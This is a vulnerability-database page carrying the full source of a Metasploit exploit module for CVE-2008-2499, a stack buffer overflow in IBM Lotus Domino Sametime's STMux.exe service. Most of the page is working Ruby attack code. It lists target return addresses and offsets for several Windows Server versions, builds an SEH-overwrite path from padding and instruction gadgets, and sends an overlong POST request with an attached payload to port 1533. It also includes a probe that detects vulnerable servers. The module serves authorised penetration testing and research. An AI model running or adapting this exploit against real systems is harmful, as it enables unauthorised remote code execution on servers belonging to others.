IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow

2008-11-14T11:04:33
ID MSF:EXPLOIT/WINDOWS/LOTUS/DOMINO_SAMETIME_STMUX
Type metasploit
Reporter Rapid7
Modified 2017-11-08T16:00:24

Description

This module exploits a stack buffer overflow in Lotus Domino\'s Sametime Server. By sending an overly long POST request to the Multiplexer STMux.exe service we are able to overwrite SEH. Based on the exploit by Manuel Santamarina Suarez.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'		=> 'IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow',
      'Description'	=> %q{
          This module exploits a stack buffer overflow in Lotus Domino\'s Sametime
        Server. By sending an overly long POST request to the Multiplexer
        STMux.exe service we are able to overwrite SEH. Based on the exploit
        by Manuel Santamarina Suarez.
      },
      'Author'		   => [ 'aushack', 'riaf <riaf[at]mysec.org>' ],
      'Arch'			=> [ ARCH_X86 ],
      'License'		=> MSF_LICENSE,
      'References'	=>
        [
          [ 'CVE', '2008-2499' ],
          [ 'OSVDB', '45610' ],
          [ 'BID', '29328' ],
          [ 'ZDI', '08-028' ],
        ],
      'Privileged'		=> true,
      'DefaultOptions'	=>
        {
          'EXITFUNC' => 'seh',
        },
      'Payload'		=>
        {
          'Space'			=> 1024,
          'BadChars'		=> "\x00\x0a\x0d",
          'StackAdjustment'	=> -3500,
        },
      'Platform' => ['win'],
      'Targets'  =>
        [
          # Patrick - Tested OK against Windows 2003 SP1 20081114
          [ 'Lotus Sametime 7.5 on Windows Server 2000 SP4', { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 268 ] }], # pop ecx, pop exc, ret msvcr71.dll
          [ 'Lotus Sametime 7.5 on Windows Server 2003 SP1', { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 269 ] }], # pop ecx, pop exc, ret msvcr71.dll
          [ 'Lotus Sametime 7.5 on Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }],
          [ 'Lotus Sametime 7.5.1  Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 5, 269 ] }],
          [ 'Lotus Sametime 8.0.0  Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }],
        ],
      'DisclosureDate' => 'May 21 2008',
      'DefaultTarget' => 1))

    register_options(
      [
        Opt::RPORT(1533),
      ])
  end

  def check
    connect

    req = "HEAD / HTTP/1.1\r\n"
    req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
    req << "User-Agent: Sametime Community Agent\r\n\r\n"

    sock.put(req)
    res = sock.get_once || ''

    disconnect

    if (res.to_s =~/Lotus-Domino/)
      connect

      req = "GET /CommunityCBR HTTP/1.1\r\n"
      req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
      req << "User-Agent: Sametime Community Agent\r\n\r\n"
      sock.put(req)
      res = sock.get_once || ''

      disconnect

      if (res.to_s =~ /200 OK/)
        return Exploit::CheckCode::Detected
      end
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    connect

    pad1 = rand_text_alpha_lower(44)
    pad2 = rand_text_alpha_lower(29)

    # Patrick - We should use Metasm here.
    popebx = Metasm::Shellcode.assemble(Metasm::Ia32.new, "pop ebx").encode_string * target['Offset'][0]
    popad	 = Metasm::Shellcode.assemble(Metasm::Ia32.new, "popad").encode_string * target['Offset'][1]
    esp  = "\xff\x24\x24" # dword ptr ss:[esp]
    jmp  = "\x74\x23" + "\x75\x21" # je short, jnz short
    seh = [target['Ret']].pack('V')

    path = pad1 + jmp + seh + pad2 + popebx + popad + esp

    req = "POST /CommunityCBR/CC.39.#{path}/\r\n"
    req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
    req << "User-Agent: Sametime Community Agent\r\n"
    req << "Content-Length: #{payload.encoded.length}\r\n"
    req << "Connection: Close\r\n"
    req << "Cache-Control: no-cache\r\n\r\n"
    req << payload.encoded

    sock.put(req)

    handler
    disconnect
  end
end